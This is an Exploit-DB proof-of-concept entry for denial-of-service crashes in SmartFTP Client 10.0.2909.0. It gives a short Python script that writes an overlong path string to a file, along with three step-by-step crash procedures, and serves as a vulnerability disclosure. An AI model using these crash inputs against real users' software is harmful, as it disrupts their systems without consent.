SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)

EDB-ID:

50266

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2021-09-06


# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit

=========================================================================

buffer = "//"
buffer += "A" * 423

f = open ("path.txt", "w")
f.write(buffer)
f.close()

1. Run the python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
4. In Path, copy paste the content of the "path.txt" generated by the python script
5. Click "OK"
6. SmartFTP client crashes

=======================================================================
1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes

=======================================================================

1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
3. SmartFTP client crashes